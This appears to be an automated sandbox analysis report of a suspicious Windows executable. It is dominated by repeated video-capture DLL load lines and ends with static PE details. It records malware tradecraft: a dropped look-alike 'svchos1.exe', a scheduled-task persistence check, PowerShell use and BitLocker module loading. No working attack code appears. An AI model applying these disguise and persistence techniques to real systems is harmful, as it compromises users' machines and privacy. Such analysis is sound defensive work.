Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SystemProcess18.exe	Section loaded: msvfw32.dll	Jump to behavior

Source: C:\Users\user\Desktop\SystemProcess18.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: SystemProcess18.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SystemProcess18.exe

Static file information: File size 1756160 > 1048576

Source: SystemProcess18.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x124200

Source: SystemProcess18.exe

Static PE information: More than 200 imports for USER32.dll

Source: SystemProcess18.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SystemProcess18.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SystemProcess18.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SystemProcess18.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SystemProcess18.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SystemProcess18.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: SystemProcess18.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: SystemProcess18.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\ZZ\Desktop\RpcTsch\Release\RpcTsch.pdb source: SystemProcess18.exe, SystemProcess18.exe, 00000000.00000003.1485028271.0000000003DE0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\zz\Desktop\CCCC\Release\CCCC.pdb source: SystemProcess18.exe, 00000000.00000000.1226278101.00000000001C6000.00000002.00000001.01000000.00000003.sdmp, SystemProcess18.exe, 00000003.00000000.1266376609.00000000001C6000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: \Release\Dll1.pdb source: svchos1.exe

Source: SystemProcess18.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SystemProcess18.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SystemProcess18.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SystemProcess18.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SystemProcess18.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\Public\Documents\MM\svchos1.exe

Code function: 28_2_007C24A8 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

28_2_007C24A8

Source: C:\Users\user\Desktop\SystemProcess18.exe	Code function: 0_3_03DF5ED9 push esi; ret	0_3_03DF5EE2
Source: C:\Users\user\Desktop\SystemProcess18.exe	Code function: 0_3_03DF360C push ds; ret	0_3_03DF3615
Source: C:\Users\user\Desktop\SystemProcess18.exe	Code function: 0_3_03DF3620 push esi; ret	0_3_03DF3621
Source: C:\Users\user\Desktop\SystemProcess18.exe	Code function: 0_3_03DF2D28 push ecx; ret	0_3_03DF2D3B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_041A4277 push ebx; ret	10_2_041A42DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_041A3A9B push ebx; retf	10_2_041A3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_041A3ADB push ebx; retf	10_2_041A3ADA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_007F633D push eax; ret	19_2_007F6351
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_007B20F5 push ecx; ret	28_2_007B2108
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_007B1CA7 push ecx; ret	28_2_007B1CBA
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_034AE134 push eax; ret	28_2_034AE162
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_035ED7B0 push eax; ret	28_2_035ED7DE
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 28_2_03678A44 push ebp; retf	28_2_03678A48
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_007B20F5 push ecx; ret	29_2_007B2108
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_007B1CA7 push ecx; ret	29_2_007B1CBA
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_009906BF push ebp; ret	29_2_009906C7
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_00982B0F push ecx; ret	29_2_00982B22
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_01042D8B push ecx; ret	29_2_01042D9E
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_01063C2D push esi; ret	29_2_01063C36
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_029AE134 push eax; ret	29_2_029AE162
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_030AD7B0 push eax; ret	29_2_030AD7DE
Source: C:\Users\Public\Documents\MM\svchos1.exe	Code function: 29_2_03138A44 push ebp; retf	29_2_03138A48

Source: C:\Users\user\Desktop\SystemProcess18.exe

File created: C:\Users\Public\Documents\MM\svchos1.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SystemProcess18.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MM

Source: C:\Users\Public\Documents\MM\svchos1.exe

28_2_035DF0E0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
